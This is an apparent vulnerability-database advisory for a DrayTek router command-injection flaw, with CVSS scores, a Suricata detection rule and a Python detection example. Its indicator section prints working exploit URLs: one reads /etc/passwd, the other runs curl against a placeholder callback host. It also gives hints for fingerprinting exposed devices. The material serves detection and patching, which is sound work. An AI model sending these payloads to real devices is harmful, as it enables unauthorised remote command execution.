cbcvebase.
CVE-2024-12987
published 2024-12-27


Priority P197 · critical · CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability (remediation due 2025-06-05)
Exploited in the wild
EPSS: 98.13% (99.9th percentile)
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.

Affected (4 ranges)

Vendor    Product
draytek   vigor2960
draytek   vigor2960_firmware
draytek   vigor300b
draytek   vigor300b_firmware

Version range / fixed in: firmware 1.5.1.4 is affected and 1.5.1.5 addresses the issue (per the description above); the per-range columns did not survive extraction.

Detection & IOCs (extracted from sources)

path:  /cgi-bin/mainfunction.cgi/apmcfgupload
url:   /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd
url:   /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}{{interactsh-url}}
bytes: |b4 25 35 32 24 63 25 35 32 24 63|
snort (Emerging Threats SID 2059890):
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/mainfunction.cgi/apmcfgupload"; fast_pattern; content:"session|3d|"; content:"|b4 25 35 32 24 63 25 35 32 24 63|"; distance:0; reference:url,nvd.nist.gov/vuln/detail/CVE-2024-12987; reference:cve,2024-12987; classtype:web-application-attack; sid:2059890; rev:1; metadata:affected_product DrayTek, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_05, cve CVE_2024_12987, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_02_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • The exploit targets the `session` parameter of a GET request to `/cgi-bin/mainfunction.cgi/apmcfgupload`. The value is padded with a long run of `x`, followed by `%52$c%52$c` (a positional printf-style conversion) to insert the newline/special characters that break out of the intended command, then the shell command itself, with `${IFS}` standing in for spaces.
  • Emerging Threats SID 2059890 fires on a GET to the vulnerable URI when `session=` is followed, at any later offset (`distance:0`), by the bytes `|b4 25 35 32 24 63 25 35 32 24 63|`, i.e. 0xb4 then `%52$c%52$c`. Two caveats: the rule uses Suricata sticky-buffer syntax (`http.method`, `http.uri`), so it needs Suricata 5 or later rather than Snort 2; and the two URL IOCs above have `0.` (0x30 0x2e) before `%52$c`, not 0xb4, so test the rule against the payload variant you actually expect to see. Match on the raw URI: after percent-decoding, `%52` becomes `R` and the `%52$c` signature disappears.
  • Exposed devices can be fingerprinted via FOFA on the `DWS` Server header together with specific JavaScript/language markers from the login page.
  • A successful `cat${IFS}/etc/passwd` payload returns HTTP 200 with the `DWS` Server header and a body matching `root:.*:0:0:` (the passwd root line).
  • Out-of-band (OOB) detection: the second payload swaps the command for `curl${IFS}{{interactsh-url}}`; an interactsh callback confirms blind command execution when the response body cannot be read.
  • The vulnerability is unauthenticated (PR:N) and remotely exploitable with no user interaction; the web management interface should not be exposed to the internet.
  • The rule metadata `tls_state TLSDecrypt` and `deployment SSLDecrypt` mean the HTTPS management interface must be decrypted (TLS inspection) for the signature to see the URI; without it only plaintext HTTP probes are caught.
  • Sources list Vigor2960, Vigor300B and Vigor3900 at firmware ≤1.5.1.4 as affected; the CPE ranges above cover only Vigor2960 and Vigor300B. Version 1.5.1.5 patches the issue.
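As an added example (not code from this page, from Emerging Threats or from DrayTek), the rule's match conditions and the response fingerprint above are reproduced as Python predicates and run over constructed request lines. It also shows why the `%52$c` signature has to be matched on the raw URI: percent-decoding turns `%52` into `R`. The broader `heuristic_matches` predicate, the 58-character padding and the sample line carrying the 0xb4 byte are assumptions made for the demonstration, not observed traffic.

```python
"""CVE-2024-12987 detection helpers, applied to constructed sample traffic.

Added example: ET SID 2059890's match logic and the page's response
fingerprint as plain Python predicates. Sample lines are constructed.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

VULN_PATH = "/cgi-bin/mainfunction.cgi/apmcfgupload"
# Byte content from ET SID 2059890: 0xb4 followed by "%52$c%52$c".
ET_BYTES = bytes.fromhex("b4 25 35 32 24 63 25 35 32 24 63")
# Assumption (added, broader heuristic): the positional-printf pair on its own,
# whatever byte precedes it, so the "0." shape of the published URLs is caught too.
FMT_PAIR = b"%52$c%52$c"
# Response fingerprint from the page: the /etc/passwd root line in the body.
PASSWD_RE = re.compile(r"root:.*:0:0:")


def parse_request_line(line: str) -> Dict[str, str]:
    """Split 'METHOD URI HTTP/x.y'; the URI stays raw (urlsplit does not decode %xx)."""
    method, uri, _version = line.split(" ", 2)
    parts = urlsplit(uri)
    return {"method": method, "path": parts.path, "query": parts.query}


def _session_tail(req: Dict[str, str]) -> Optional[bytes]:
    """Raw bytes following 'session=' in the query string, or None if absent."""
    raw = req["query"].encode("latin-1")
    idx = raw.find(b"session=")
    return None if idx == -1 else raw[idx + len(b"session="):]


def et_rule_matches(line: str) -> bool:
    """Mirror SID 2059890: GET, vulnerable path, 'session=' then ET_BYTES after it."""
    req = parse_request_line(line)
    if req["method"] != "GET" or req["path"] != VULN_PATH:
        return False
    tail = _session_tail(req)
    return tail is not None and ET_BYTES in tail


def heuristic_matches(line: str) -> bool:
    """Added heuristic: any method, vulnerable path, %52$c%52$c anywhere after session=."""
    req = parse_request_line(line)
    if req["path"] != VULN_PATH:
        return False
    tail = _session_tail(req)
    return tail is not None and FMT_PAIR in tail


def decoded_view_matches(line: str) -> bool:
    """What a pipeline that percent-decodes first would see: %52 becomes 'R',
    so the literal %52$c is gone and a decoded-string match fails."""
    req = parse_request_line(line)
    return "%52$c" in unquote(req["query"])


def exploitation_succeeded(status: int, headers: Dict[str, str], body: str) -> bool:
    """Response fingerprint from the page: 200, Server: DWS, passwd root line in body."""
    return (status == 200
            and "DWS" in headers.get("Server", "")
            and PASSWD_RE.search(body) is not None)


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Evaluate every predicate on every request line."""
    return [{"line": i,
             "et_rule": et_rule_matches(l),
             "heuristic": heuristic_matches(l),
             "decoded_view": decoded_view_matches(l)}
            for i, l in enumerate(lines)]


# Constructed sample request lines (not captured traffic); PAD length is an assumption.
PAD = "x" * 58
SAMPLE_REQUESTS = [
    # Shape of the published payload: "0." precedes the format pair.
    f"GET {VULN_PATH}?session={PAD}0.%52$c%52$ccat${{IFS}}/etc/passwd HTTP/1.1",
    # Constructed variant carrying the 0xb4 byte the ET rule anchors on.
    f"GET {VULN_PATH}?session={PAD}\xb4%52$c%52$ccat${{IFS}}/etc/passwd HTTP/1.1",
    # Benign requests against the same CGI.
    f"GET {VULN_PATH}?session=abc123 HTTP/1.1",
    "POST /cgi-bin/mainfunction.cgi?action=login HTTP/1.1",
]

if __name__ == "__main__":
    for row in scan(SAMPLE_REQUESTS):
        print(row)
    print(exploitation_succeeded(200, {"Server": "DWS"},
                                 "root:x:0:0:root:/root:/bin/sh\n"))
```

Run as a script it prints one row per sample line. Only the constructed 0xb4 line satisfies the rule's byte content; the published URL shape, which has `0.` in that position, is caught only by the broader heuristic, and neither is visible once the query string has been percent-decoded.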

CVSS provenance

NVD v3.1    9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v4.0    6.9  MEDIUM    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
NVD v2.0    7.5  HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck   6.9  MEDIUM
CISA        6.9  MEDIUM

The v3.1 and v4.0 assessments agree on the attack side (network, low complexity, no privileges, no interaction) but not on impact: v3.1 rates confidentiality, integrity and availability High (9.8), while v4.0 rates each Low (6.9). The 9.8 is the score carried in the header above; when prioritising, weigh the KEV listing and the 98.13% EPSS over either base score.